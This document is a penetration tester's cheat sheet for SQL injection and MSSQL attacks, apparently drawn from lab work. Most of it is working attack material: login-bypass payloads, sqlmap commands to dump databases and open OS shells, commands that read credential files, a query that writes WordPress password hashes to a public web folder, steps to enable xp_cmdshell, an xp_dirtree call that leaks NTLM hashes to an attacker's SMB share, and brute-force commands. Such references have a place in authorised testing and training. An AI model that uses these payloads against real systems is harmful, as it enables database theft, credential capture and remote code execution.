https://portswigger.net/web-security/sql-injection/cheat-sheet https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/ https://github.com/sqlmapproject/sqlmap/wiki/Usage#uri-injection-point


admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

SQL Injection: SQLMap

# Retrieve Databases (from a request saved with Burp) 
sqlmap -r request_10-86-74-7-login.txt --dbs  

# Quote the URL: an unquoted & in a query string backgrounds the command in the shell
sqlmap -u "http://url/?id=1" -p id --dbs

sqlmap -u enterprise.htb/?query=1 --batch -D wordpress -T wp_posts --dump

sqlmap -u url --sql-query "SHOW COLUMNS FROM wordpress.wp_posts;"
  
retrieved: smallville  
available databases:  
information_schema  
smallville  
  
# List the tables of a database
sqlmap -r request_10-86-74-7-login.txt -D smallville --tables  
  
Database: smallville  
[2 tables]  
+--------------+  
| users        |  
| product      |  
+--------------+  
  
# Dump data  
sqlmap -r request_10-86-74-7-login.txt -D smallville -T users --dump  
  
Database: smallville  
Table: users  
[2 entries]  
+------------------------------+-------------+  
| hash                         | username    |  
+------------------------------+-------------+  
| AE528135395036076442096      | klark       | 
| AE818524557893270397695      | lois        | 
+------------------------------+-------------+
  
# Running specific queries
sqlmap -r request_10-86-74-7-login.txt --sql-shell  
  
sql-shell> select hash,username from users where hash like 'AE528135395036076442096';  
[11:23:02] [INFO] fetching SQL SELECT statement query output: 'select hash,username from users where hash like 'AE528135395036076442096''  
[11:23:02] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind  
[11:23:02] [INFO] retrieved: 1  
[11:23:09] [INFO] retrieved: AE528135395036076442096  
[11:30:11] [INFO] retrieved: klark  

Add custom payloads (sqlmap loads its injection payload definitions from the XML files in this directory; add or edit a file there)

/usr/share/sqlmap/data/xml/payloads/

Simple usage

sqlmap -u https://site.com/

Automatic GET request parameter

sqlmap -u "https://site.com/page?p1=value1&p2=value2"   # quote the URL so the shell does not treat & as a job separator

Use POST request

sqlmap -u https://site.com/ --data="p1=value1&p2=value2"

Request file as input (get it from Burpsuite)

sqlmap -r request.txt

Use authenticated session with cookie (pass the full Cookie header value as name=value pairs, ';'-separated)

sqlmap -u https://site.com/ --cookie="PHPSESSID=Session_Cookie_Value"

Use authenticated session with auth headers

sqlmap -u https://site.com/ --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"

Basic authentication (--auth-cred must be paired with --auth-type)

sqlmap -u https://site.com/ --auth-type Basic --auth-cred "username:password"

Custom SQL query

sqlmap -u https://site.com/ --sql-query "select * from xxx;"

Get OS shell (needs high DBMS privileges, e.g. file write into a web-served directory on MySQL/PostgreSQL or xp_cmdshell on MSSQL; it drops files on the target, so record what was written for cleanup)

sqlmap -u https://site.com/ --os-shell

Get SQL shell (note: --sqlmap-shell is a different option, an interactive sqlmap command prompt)

sqlmap -u https://site.com/ --sql-shell

Use attack techniques

sqlmap -u https://site.com/ --technique=BEUSTQ

# B: Boolean-based blind
# E: Error-based
# U: Union query-based
# S: Stacked queries
# T: Time-based blind
# Q: Inline queries

SQL

Extract credentials from files

cat /etc/mysql/debian.cnf
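# Pull printable tokens out of the MySQL grant table on disk (needs read access to the
# datadir, i.e. root or the mysql OS user). user.MYD only exists while mysql.user is
# MyISAM (MySQL <= 5.7 / MariaDB); MySQL 8 keeps grant tables in InnoDB, so check first.
# 'a-Z' is not a valid bracket range in POSIX grep; spell out a-zA-Z.
grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"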
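-- Dump WordPress credentials to a web-reachable file (MySQL).
-- Requires the FILE privilege and a secure_file_priv setting that permits
-- that directory, and the directory must be writable by the mysqld OS user.
-- The output lands under wp-content/uploads, so it is fetchable by anyone
-- who can reach the site: delete it once collected.
SELECT CONCAT_WS(':', user_login, user_pass)
FROM wp_users
INTO OUTFILE '/var/www/https/blogblog/wp-content/uploads/creds.txt';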
blah';exec master..xp_cmdshell 'ping www.site.com -l 65000 -t'; --

wordpress

--sql-query "select id,post_name,post_content,post_excerpt from wp_posts where id=66 limit 0,1;"
--sql-query "select user_login,user_pass from wp_users;"

https://www.asafety.fr/mssql-injection-cheat-sheet/

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -u

MSSQL

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

The queries below can be run from any MSSQL client (sqsh, impacket's mssqlclient.py, SSMS, or Visual Studio's SQL tooling)

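-- Enumerate the databases the current login can see.
EXEC sp_databases;

-- Enumerate schemas in the *current* database: INFORMATION_SCHEMA views are
-- scoped to the database you are connected to, so this is not a database list.
SELECT schema_name
FROM information_schema.schemata;

-- Enumerate user tables in master. Explicit columns instead of SELECT *:
-- the view's other columns add nothing and the output stays stable.
SELECT
    TABLE_CATALOG,
    TABLE_SCHEMA,
    TABLE_NAME
FROM master.INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';
-- GO is a batch separator understood by sqlcmd/SSMS, not T-SQL; clients that
-- send raw T-SQL (sqlmap --sql-query, mssqlclient.py) may reject it.
GO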

-- db_accessadmin
sqsh
mssqlclient.py sa:xxx@IP
mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>

enable xp_cmdshell

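-- Enable xp_cmdshell. Needs sysadmin (or ALTER SETTINGS); each sp_configure
-- change only takes effect after RECONFIGURE. The setting is server-wide,
-- persists, and is a well-known detection trigger, so revert it when done.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- The command is passed as a single quoted string, e.g. EXEC master..xp_cmdshell 'whoami';
EXEC master..xp_cmdshell '<command>';
-- Cleanup once finished:
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
-- EXEC sp_configure 'show advanced options', 0; RECONFIGURE;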

Concatenate query result

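-- Collapse many rows into one delimited string so a single-row injection or
-- --sql-query can pull them in one go. The separator is the second argument
-- (a comma, not a '.'); STRING_AGG requires SQL Server 2017+.
SELECT STRING_AGG(CONCAT(name, ':', id), '|')
FROM <table>;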

Steal NTLM hash with mssql

sudo smbserver.py -smb2support liodeus .
SQL> exec master..xp_dirtree '\\<IP>\liodeus\' # Forces the SQL Server service account to authenticate to our SMB share (xp_dirtree is usually executable by low-privileged logins). Crack the captured Net-NTLM challenge/response with hashcat (-m 5600 for NTLMv2) or john, or relay it where SMB signing is not enforced.

Common issues

In case of continuous data retrieval problems you are advised to try the switch '--no-cast' or the switch '--hex'

Tell sqlmap EXACTLY how to determine a True response: '--string' and '--code'

--string => portion of text present in the HTTP response body when the injected condition is true
--code   => HTTP status code returned when the injected condition is true